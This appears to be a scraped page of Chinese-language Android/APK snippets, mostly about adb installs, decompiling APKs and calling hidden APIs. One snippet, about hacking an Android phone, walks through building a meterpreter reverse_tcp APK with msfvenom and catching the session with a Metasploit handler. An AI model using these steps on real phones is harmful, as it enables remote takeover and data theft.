apk

adb 安装apk到指定设备

拈花ヽ惹草 提交于 2020-02-24 18:39:27
一、打印设备代号 adb devices 红色和绿色区域为设备代号。 二、命令 adb -s 4580fa7e /User/aaa.apk 加上"-s 设备代号”,apk路径替换成自己的。 三、安装成功 Performing Streamed Install:正在执行安装 Success:安装成功 来源: CSDN 作者: 兴趣无价 链接: https://blog.csdn.net/qq_39420519/article/details/104480744

《自拍教程18》adb_Android设备debug连接工具

拟墨画扇 提交于 2020-02-23 20:51:47
adb命令介绍 做Android App测试,Android手机系统测试, 还有很多Android终端产品(手表,车载,智能电视,智能手表等) 都必须用adb命令,通过USB接口,与Android设备建立连接建立测试环境。 adb.exe(Linux/Ubuntu/imac下是未带后缀的adb), 全称是:Android Debug Bridge, 是android sdk自带的命令行调试工具软件。 一般在.\sdk\platform-tools\的路径下,当然用adb完全没必要下载整套sdk, Windows操作系统上,只需要以下3个文件即可独立运行: adb.exe AdbWinApi.dll AdbWinUsbApi.dll Linux操作系统上,只需要: adb 这个独立的可执行文件即可运行。 下载地址 http://adbshell.com/upload/adb.zip 常见用法(暂只列出针对测试人员的常见用法) */ /*--> */ 序号 adb命令 注意:这是电脑端的命令 不是Android里边的命令 释义 常见用法 1 adb shell 电脑端通过此命令, 能进入Android手机的后台, 直接用linux 命令操作Android adb shell 进入Android 后台。 # cd /sdcard # reboot # chmod 777 -R

浅谈Android反编译工具apktool,dex2jar,jd-gui

生来就可爱ヽ(ⅴ<●) 提交于 2020-02-22 14:34:48
自己布局的模式或方式很固定,看见一个炫酷的界面,总想看看是怎么布局的,今天小蜗牛就带大家学习怎么使用这三个工具。。 一 去各个软件的官网下载最新的软件 二 分别介绍各个软件的使用 1.首先使用apktool 将要反编译的apk放在已经下载的apktool.bat所在目录,如下图: 然后cmd命令行输入apktool d -f xxx.apk tt 注意:xxx.apk 是要反编译的apk, tt是把apk反编译后文件放入的地方,特别 提醒, 起初不要建这个目录,执行前面的命令后自动生成的。 如果编译成功会生成如下的目录结构 res即为我们要查看的资源文件,有图片,布局等。。。 2.dex2jar工具 将apk后缀改为zip,打开压缩包,即可以看见classes.dex 将其复制到dex2jar.bat所在的目录,然后在cmd命令行输入dex2jar.bat classes.dex 就会生成classes-dex2jar.dex,如下图所示: 最后一个工具就是用来打开这个jar,查看里面代码的结构。 其中a,b,c等就是被混淆的代码只能看代码结构。 注意:有时候代码反编译会出错,有的是apk混淆原因不能正常反编译,这有一个连接介绍解决问题的办法,很不错的 连接:http://blog.csdn.net/jiangwei0910410003/article/details

Android Known Sources

你。 提交于 2020-02-18 15:06:51
问题 When you install an apk file that is from an unknown source, Android will complain and verify that you want to install that apk file. This file must be checked to a list of known sources. I am interested to know where that list of known sources is located on Android AOSP. Edit: I apologize if my question is confusing but allow me to clarify. When you install an APK from usb or email Android will prompt you saying you are installing an app from an unknown source. At this point you can either

Android APK调用系统隐藏api

此生再无相见时 提交于 2020-02-17 17:40:38
APK调用隐藏api 已调用SerialService为例 1,修改frameworks\base\core\java\android\hardware\SerialManager.java 添加如下代码: public static SerialManager getInstance(Context context){ mSerialManager = (SerialManager)context.getSystemService(Context.SERIAL_SERVICE); return mSerialManager; } 2,编译代码生成class.jar 命令:./buildall_userdebug.sh B5528BIO 编译成功后,会生成 out\target\common\obj\JAVA_LIBRARIES\framework_intermediates\classes.jar 3,将classes.jar改名为framework.jar导入到android studio中,如图: 4,在project下的build.gradle下添加如下代码 5,调 SerialManager .java--> getInstance ()方法 调用getSerialPorts() app需要获取到android.permission.SERIAL_PORT权限

macOS下通过adb安装apk到android手机

岁酱吖の 提交于 2020-02-16 21:29:39
homebrew是macOS的一个包管理工具 1、安装homebrew ruby -e “$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)” 2、安装adb brew cask install android-platform-tools 3、运行adb adb devices 指令安装apk到android手机 (1)手机连接usb,并打开USB调试 (2)下载apk到mac上 (3)终端安装 安装指令如下: 首次安装:adb install xxx/xxx/xxx(apk路径)【拖动apk至终端即可获取apk路径】 覆盖安装:adb install -r xxx/xxx/xxx(apk路径) 参考 https://www.jianshu.com/p/69ba21b2996c https://www.cnblogs.com/mini-monkey/p/11556506.html 来源: CSDN 作者: weixin_g632637774 链接: https://blog.csdn.net/glw0223/article/details/104343462

MSF初体验—入侵安卓手机

血红的双手。 提交于 2020-02-16 07:20:40
1.生成apk程序 msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=5555 R > apk.apk 2.启动msfconsole 3.启动use exploit/multi/handler模块 4.set payload android/meterpreter/reverse_tcp 5.show options 6.准备工作 msf exploit(handler) > set LHOST 192.168.1.101 LHOST => 192.168.1.101 msf exploit(handler) > set LPORT 5555 LPORT => 5555 msf exploit(handler) > exploit(运行apk程序) [*] Started reverse TCP handler on 192.168.1.101:5555 [*] Starting the payload handler... [*] Sending stage (63194 bytes) to 192.168.1.105 [*] Meterpreter session 1 opened (192.168.1.101:5555 -> 192.168.1.105:57629) at 2017-06

Update the app in another machine with same debug.keystore in android

社会主义新天地 提交于 2020-02-16 05:26:32
问题 I have installed my app in my device.Now due to some reasons I have exported my code and debug.keystore to another machine.When I rebuild the app It is saying "Re-installation failed due to different application signatures." Actully I want to update the app without uninstall. How can I do this? Thanks,Chaitanya 回答1: You can copy the previous debug.keystore from your old machine and place it in your different machine. The location of debug.keystore is typically your .android directory present

Update the app in another machine with same debug.keystore in android

帅比萌擦擦* 提交于 2020-02-16 05:25:42
问题 I have installed my app in my device.Now due to some reasons I have exported my code and debug.keystore to another machine.When I rebuild the app It is saying "Re-installation failed due to different application signatures." Actully I want to update the app without uninstall. How can I do this? Thanks,Chaitanya 回答1: You can copy the previous debug.keystore from your old machine and place it in your different machine. The location of debug.keystore is typically your .android directory present

Update the app in another machine with same debug.keystore in android

烂漫一生 提交于 2020-02-16 05:25:24
问题 I have installed my app in my device.Now due to some reasons I have exported my code and debug.keystore to another machine.When I rebuild the app It is saying "Re-installation failed due to different application signatures." Actully I want to update the app without uninstall. How can I do this? Thanks,Chaitanya 回答1: You can copy the previous debug.keystore from your old machine and place it in your different machine. The location of debug.keystore is typically your .android directory present